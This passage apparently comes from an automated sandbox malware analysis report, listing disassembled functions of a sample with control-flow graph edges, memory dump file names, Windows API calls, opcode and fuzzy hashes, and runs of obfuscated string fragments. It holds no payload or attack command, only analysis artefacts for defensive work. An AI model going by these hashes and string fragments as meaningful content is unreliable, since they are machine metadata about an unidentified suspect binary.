                                                            • Opcode Fuzzy Hash: 8a426737fd3880adcc92548b3d3c0d4f44655cb1d8f13824e967f4b7c8c84ef5
                                                            • Instruction Fuzzy Hash: 90415D2360FB8886D6514F39A4402A9ABA4FF86794F184671FE8DD3B65EF3DE4858700
                                                            Function 00007FF6A7932350 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1684 7ff6a7932350-7ff6a7932370 1685 7ff6a7932380-7ff6a7932385 1684->1685 1686 7ff6a7932387-7ff6a793238c 1685->1686 1687 7ff6a79323c0-7ff6a79323c5 1685->1687 1688 7ff6a7932400-7ff6a7932405 1686->1688 1689 7ff6a793238e-7ff6a7932393 1686->1689 1690 7ff6a7932437-7ff6a793243c 1687->1690 1691 7ff6a79323c7-7ff6a79323cc 1687->1691 1692 7ff6a79324dd-7ff6a79324e2 1688->1692 1693 7ff6a793240b-7ff6a7932410 1688->1693 1696 7ff6a7932399-7ff6a793239e 1689->1696 1697 7ff6a7932463-7ff6a7932468 1689->1697 1694 7ff6a7932372-7ff6a793237f 1690->1694 1695 7ff6a7932442-7ff6a7932447 1690->1695 1698 7ff6a79323d2-7ff6a79323d7 1691->1698 1699 7ff6a7932483-7ff6a79324c4 CreateFileW 1691->1699 1692->1685 1700 7ff6a7932416-7ff6a793241b 1693->1700 1701 7ff6a79324e7-7ff6a79324f9 1693->1701 1694->1685 1702 7ff6a793244d-7ff6a793245e 1695->1702 1703 7ff6a79324fe-7ff6a7932503 1695->1703 1704 7ff6a793246d-7ff6a793247e 1696->1704 1705 7ff6a79323a4-7ff6a79323a9 1696->1705 1697->1685 1706 7ff6a79324c9-7ff6a79324d8 1698->1706 1707 7ff6a79323dd-7ff6a79323e2 1698->1707 1699->1685 1700->1685 1708 7ff6a7932421-7ff6a7932432 1700->1708 1701->1685 1702->1685 1703->1685 1711 7ff6a7932509-7ff6a7932518 1703->1711 1704->1685 1705->1685 1709 7ff6a79323ab-7ff6a79323b8 1705->1709 1706->1685 1707->1685 1710 7ff6a79323e4-7ff6a79323f1 1707->1710 1708->1685 1709->1685 1710->1685
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43ec47b52f265d3079b7d876704c23e926ff280c2dff8d2566615240d0b39290
                                                            • Instruction ID: 85241a540daa610c1fb3551ecfdbc523a27d02ab9afeffbc1d73796837214412
                                                            • Opcode Fuzzy Hash: 43ec47b52f265d3079b7d876704c23e926ff280c2dff8d2566615240d0b39290
                                                            • Instruction Fuzzy Hash: C541A425A0F74382FA700F58A48427E96909B44BB4F20063BE9BECB7D6DE6CDC855745
                                                            Function 00007FF6A7952B60 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1713 7ff6a7952b60-7ff6a7952b8b 1714 7ff6a7952bac-7ff6a7952bb2 1713->1714 1715 7ff6a7952bb4-7ff6a7952bba 1714->1715 1716 7ff6a7952b90-7ff6a7952ba7 IsDlgButtonChecked 1714->1716 1715->1714 1717 7ff6a7952bbc-7ff6a7952bcc 1715->1717 1716->1714 1718 7ff6a7952bd5 1717->1718 1719 7ff6a7952bce-7ff6a7952bd3 1717->1719 1720 7ff6a7952bd7-7ff6a7952bdd 1718->1720 1719->1720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: ButtonChecked
                                                            • String ID:
                                                            • API String ID: 1719414920-0
                                                            • Opcode ID: 8778af4b3818d8e4ffb901c67184223e9cbe395565696766e4b7e0750789fa4b
                                                            • Instruction ID: 8c6e3772395754d19791a445036d1f5319da7c0f22625a4fbd4508d210a7b1b9
                                                            • Opcode Fuzzy Hash: 8778af4b3818d8e4ffb901c67184223e9cbe395565696766e4b7e0750789fa4b
                                                            • Instruction Fuzzy Hash: B3F0316271ABA681DA644F06F450279B360FB8EBD5F140136EE8D87BA4CE2CCA918705
                                                            Function 00007FF6A7956CD0 Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1721 7ff6a7956cd0-7ff6a7956d09 1722 7ff6a7956d2c-7ff6a7956d32 1721->1722 1723 7ff6a7956d34-7ff6a7956d3a 1722->1723 1724 7ff6a7956d10-7ff6a7956d27 RtlAllocateHeap 1722->1724 1723->1722 1725 7ff6a7956d3c-7ff6a7956d4a 1723->1725 1724->1722
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 6658f08f20bd5d31c6eade572a533d6811a9286a796815decdfaed9472b6f2bc
                                                            • Instruction ID: 9f4e1de7d1badfab969ec43ffeb6cb0b0aaedf0d8fbaa005a697e7ef4d1ca693
                                                            • Opcode Fuzzy Hash: 6658f08f20bd5d31c6eade572a533d6811a9286a796815decdfaed9472b6f2bc
                                                            • Instruction Fuzzy Hash: D1F01D66619B4585DAA48B15F89022A77A4F7C8B95F14143AEF8E83B24CF3DD8608B00
                                                            Function 00007FF6A79571A0 Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1726 7ff6a79571a0-7ff6a79571dd 1727 7ff6a79571f8-7ff6a79571fe 1726->1727 1728 7ff6a79571e0-7ff6a79571f3 RtlAllocateHeap 1727->1728 1729 7ff6a7957200-7ff6a7957206 1727->1729 1728->1727 1729->1727 1730 7ff6a7957208-7ff6a7957216 1729->1730
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 0f4cd77d285a25c364310bf16c7b0cfd854d8bad99510f3b6bd8a271a7a84355
                                                            • Instruction ID: e89a00e3dd432da575468144b69780f2cc0a4d2e877a900542524035dd6d24bd
                                                            • Opcode Fuzzy Hash: 0f4cd77d285a25c364310bf16c7b0cfd854d8bad99510f3b6bd8a271a7a84355
                                                            • Instruction Fuzzy Hash: 3FF0123571AB4585DA948B05F8803297764FB88790F900526EE9E83B24DF3DD9508B00
                                                            Function 00007FF6A79326F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1731 7ff6a79326f0-7ff6a7932701 1732 7ff6a793271e-7ff6a7932724 1731->1732 1733 7ff6a7932726-7ff6a793272c 1732->1733 1734 7ff6a7932710-7ff6a7932719 GetFileAttributesA 1732->1734 1733->1732 1735 7ff6a793272e-7ff6a7932741 1733->1735 1734->1732
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 9606837ca2071e5102ba306217c6042cad000169562a9886ad29fa54152ccee1
                                                            • Instruction ID: 5645838ec9894d6bd9697510840098ccce645a46999dd99eb23ad032f4980a77
                                                            • Opcode Fuzzy Hash: 9606837ca2071e5102ba306217c6042cad000169562a9886ad29fa54152ccee1
                                                            • Instruction Fuzzy Hash: 6AE0DF2AA1C1528B9B358B29B490039A2906F44314F244B39F83FD37C5CE28F9474B08

                                                            Non-executed Functions

                                                            Function 00007FF6A793D5E3 Relevance: 38.9, Strings: 30, Instructions: 1408COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: B6O$&E5B$&E5B$(+n"$(+n"$(+n"$)3=E$)\6$*3=E$-)u$.)u$.)u$1l<$2l<$<.b$=.b$=.b$C]"y$D]"y$Nt1)$PUQ$U"Wi$Y,G8$`]hf$g-Nz$j]Pr$j]Pr$q#+c$r#+c$|p8&
                                                            • API String ID: 0-1463865409
                                                            • Opcode ID: ba07158a7a58b597a5d27dee6b115183bcc9ce8703389d19560342c748d59b24
                                                            • Instruction ID: f8e258ceba6ac8284237d2d71d07cfd64443eeae458bb295fd37ea925cebf92d
                                                            • Opcode Fuzzy Hash: ba07158a7a58b597a5d27dee6b115183bcc9ce8703389d19560342c748d59b24
                                                            • Instruction Fuzzy Hash: D6E2A236A0A7C3CAEB748F2D88903FD2294EB44758F14453BDA5DCF79ADE28E5908741
                                                            Function 00007FF6A78E3650 Relevance: 36.8, Strings: 28, Instructions: 1782COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: OG-$OG-$OG-$$bjq$%bjq$%bjq$6T]$6T]$89L$99L$99L$99L$99L$PH($PH($pR|,$qR|,$qR|,$qR|,$wfDg$#$#$1E$FwY$FwY$FwY$Lo|$Lo|$Lo|
                                                            • API String ID: 0-1785333160
                                                            • Opcode ID: d40954fcd5ed83225f84db0f972c5b60976609d577f88161a953eaf9d2c5f4b2
                                                            • Instruction ID: 59deb534bb2253c39011a160923eba2efd4915a4f9410cb885c9f8cc26473f70
                                                            • Opcode Fuzzy Hash: d40954fcd5ed83225f84db0f972c5b60976609d577f88161a953eaf9d2c5f4b2
                                                            • Instruction Fuzzy Hash: CBF23A36A1E2868AEE748F25A48067F6A94EB87750F5441B2E95DC7FE4CF2CEC405F01
                                                            Function 00007FF6A79367E0 Relevance: 30.1, Strings: 23, Instructions: 1322COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +lc$+lc$9,O$Q6?$Q6?$UMaS$UMaS$UMaS$`Y?a$aY?a$aY?a$b1""$c1""$c1""$e!Rq$f!Rq$f!Rq$~7$~i$~i$[#i$[#i$[#i
                                                            • API String ID: 0-3612720006
                                                            • Opcode ID: bc8982237bfa0eaf563b090632e40891d7a80798a92bf3815a9de12c3bfc6418
                                                            • Instruction ID: 1e6c66057e834906e814422ce76eac0d7999d983604f3ac08afd5afb3708b505
                                                            • Opcode Fuzzy Hash: bc8982237bfa0eaf563b090632e40891d7a80798a92bf3815a9de12c3bfc6418
                                                            • Instruction Fuzzy Hash: 50C20735E0E687C6EA748F19A19067EEB90EB49750F20453BE65DC77D6CF2CE8408B06
                                                            Function 00007FF6A7908870 Relevance: 29.5, Strings: 21, Instructions: 3210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )^12$)^12$.VVy$.VVy$4C g$4C g$4C g$5p, $6p, $6p, $Lw"$Lw"$W0C>$W0C>$fnH;$fnH;$gBl$gBl$sm9Z$tm9Z$tm9Z
                                                            • API String ID: 0-1809199141
                                                            • Opcode ID: 413491994c65056abdcf58f430e274f236bd6a314badafcbf07fa716df7838a9
                                                            • Instruction ID: 7845aa1061d92cc2b9f261187c66651bdb72a946c8583fbafce74e12584b6b1a
                                                            • Opcode Fuzzy Hash: 413491994c65056abdcf58f430e274f236bd6a314badafcbf07fa716df7838a9
                                                            • Instruction Fuzzy Hash: 8A63B826B1ABC7C9EB748F2988816FD2390FB44798F200537D65DCBF95DE29E6418342
                                                            Function 00007FF6A78D5FD0 Relevance: 26.1, Strings: 19, Instructions: 2380COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !2`)$"2`)$'y=$(y=$(y=$(y=$(y=$7#z'$7#z'$O2l$O2l$R)6$R)6$v9gP$w9gP$w9gP$ hi$ hi$ hi
                                                            • API String ID: 0-1340172241
                                                            • Opcode ID: 9d19d9a4c398c2ee22d14fceda1047687c5961bb235e0093d220676c3f6e1c9b
                                                            • Instruction ID: 4729d67d1a081d3c7bdd64e921ee00966c01cc19ea3d63db76b2d98bc5821d65
                                                            • Opcode Fuzzy Hash: 9d19d9a4c398c2ee22d14fceda1047687c5961bb235e0093d220676c3f6e1c9b
                                                            • Instruction Fuzzy Hash: A533C821B0E6C686ED784F14A0B437E6AD1EF95390F10417BD94F97BD6DE2DE8408B0A
                                                            Function 00007FF6A7902A60 Relevance: 25.8, Strings: 17, Instructions: 4595COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &$*d$&$*d$&$*d$NHnH$NHnH$a[V~$a[V~$cm1$cm1$q\#$q\#$rji,$sji,$sji,$9[~$v$v
                                                            • API String ID: 0-2653315672
                                                            • Opcode ID: bcf57d71c9fbf0448bc486f945ee85c00261d1572cb3e0db7403ea9c862792ea
                                                            • Instruction ID: e7dc5a897126bfc4ca938fb75d0ccff00bb5077b9e8957062e1ecf7012e69953
                                                            • Opcode Fuzzy Hash: bcf57d71c9fbf0448bc486f945ee85c00261d1572cb3e0db7403ea9c862792ea
                                                            • Instruction Fuzzy Hash: 2AA3A526B1A7C789EB748F2988943FD23A0FB49B58F104537DA0DCBB96CE2CD5418746
                                                            Function 00007FF6A79275E0 Relevance: 23.9, Strings: 18, Instructions: 1374COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ma?$+us$+us$?N*$@N*$@N*$I6E$J6E$J6E$J6E$J6E$unordered_map/set too long$&{R$&{R$&{R$fA$fA$fA
                                                            • API String ID: 0-4039308801
                                                            • Opcode ID: 87a15a506ab4338ba3655a15689dec574433df0b6bb99c3818e6eebbe88b1e0f
                                                            • Instruction ID: 3f901a1df256751ed2213c92ad47ca3ef95ca54eecfa9c5d17930c577451ef9c
                                                            • Opcode Fuzzy Hash: 87a15a506ab4338ba3655a15689dec574433df0b6bb99c3818e6eebbe88b1e0f
                                                            • Instruction Fuzzy Hash: 18D2B676A0EEC785DA749F19A0802BE77A0F785750F105173DB8DE7BA5CE2CD4808B92
                                                            Function 00007FF6A7919E70 Relevance: 23.5, Strings: 16, Instructions: 3478COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5wSK$5wSK$B."$C."$C."$gFrW$hFrW$hFrW$i@]9$i@]9$s"#"$s"#"$w)$w)$z$z
                                                            • API String ID: 0-1745162551
                                                            • Opcode ID: 7a9bcc6d5c2eb5ee39eec83c8395e8b6173a5a6103b517e8c248e00f2193a17a
                                                            • Instruction ID: 565b51dc3b4ea3bac3562ea107168d84183293241d22c780a71cab9fa3bdf6dd
                                                            • Opcode Fuzzy Hash: 7a9bcc6d5c2eb5ee39eec83c8395e8b6173a5a6103b517e8c248e00f2193a17a
                                                            • Instruction Fuzzy Hash: A773C736A1ABC38EEBB48F25D8813FD2394EB49759F540037DA0DCB799CE29DA508711
                                                            Function 00007FF6A794B3E0 Relevance: 19.6, Strings: 15, Instructions: 871COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: o6D$o6D$%Dsv$%Dsv$(?^G$(?^G$(?^G$qoy$roy$roy$vG!$vG!$vG!$Ac6$Ac6
                                                            • API String ID: 0-863031445
                                                            • Opcode ID: cd1e5e55bef1db5d1600dcab8999ef3256c0564d102ef2647c9fd36fc30a5a05
                                                            • Instruction ID: 9543c1c27c695fc804973870c8552ae71c345c5a7781b6a6c9c77e791bd088f6
                                                            • Opcode Fuzzy Hash: cd1e5e55bef1db5d1600dcab8999ef3256c0564d102ef2647c9fd36fc30a5a05
                                                            • Instruction Fuzzy Hash: 89821036B1F68786EE748F28949027E67D0DB94394F244437D5AEC77D6CE2CE840AB42
                                                            Function 00007FF6A79152B0 Relevance: 18.5, Strings: 13, Instructions: 2280COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,B?$-B?$-B?$I#R,$I#R,$M[$M[$`paD$apaD$apaD$zHU6${HU6${HU6
                                                            • API String ID: 0-3719812843
                                                            • Opcode ID: 8384fce39ef311797b66e737c281f472c32f12821e6f46c629b586c8daefdf48
                                                            • Instruction ID: f785f02a1e616c0cd582295c3b477e05c8bc38b1121dc9e0259f76204f7b0396
                                                            • Opcode Fuzzy Hash: 8384fce39ef311797b66e737c281f472c32f12821e6f46c629b586c8daefdf48
                                                            • Instruction Fuzzy Hash: 4123E626B0A6C3CAFFB58F3888942FD67999B05354F600537D51ECFB96CE28E9518312
                                                            Function 00007FF6A78FF690 Relevance: 18.5, Strings: 14, Instructions: 1028COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %^Sx$%^Sx$(gHg$(gHg$?.bT$?.bT$LVE$LVE$v4X*$w4X*$w4X*$z7JY$z7JY$z7JY
                                                            • API String ID: 0-3310277044
                                                            • Opcode ID: 2bc39bc8b569c8c2bec80f98a3493c2111664ab61e8e1449663ca3172a8c369a
                                                            • Instruction ID: 0a57adf2b1a178d2410eac2fd8d75108e397797f315a6fc5230f58a8a6c391e9
                                                            • Opcode Fuzzy Hash: 2bc39bc8b569c8c2bec80f98a3493c2111664ab61e8e1449663ca3172a8c369a
                                                            • Instruction Fuzzy Hash: FAA2B726A1E7C786EA748F19E18067EBB91EF85750F204133EA8DC7B95DE2CF4418B01
                                                            Function 00007FF6A78DA080 Relevance: 17.6, Strings: 13, Instructions: 1306COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,+^$-+^$-+^$Pje{$Qje{$Qje{$}S_$}S_$O1e$O1e$O1e$ilQ$ilQ
                                                            • API String ID: 0-279339949
                                                            • Opcode ID: 81d85c937bb54431424860ffd489637677edc4266dde387678ca29892f026723
                                                            • Instruction ID: 1671889104f607164e6b5746ea4b677fa26fbcce2e2386cf5ff7b41aea205923
                                                            • Opcode Fuzzy Hash: 81d85c937bb54431424860ffd489637677edc4266dde387678ca29892f026723
                                                            • Instruction Fuzzy Hash: 08C2BA35A0A686CAEF748F29D8802FE2BE1EB54754F304577D94ECB795CE2CE9408346
                                                            Function 00007FF6A792E4C0 Relevance: 17.0, Strings: 12, Instructions: 2020COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
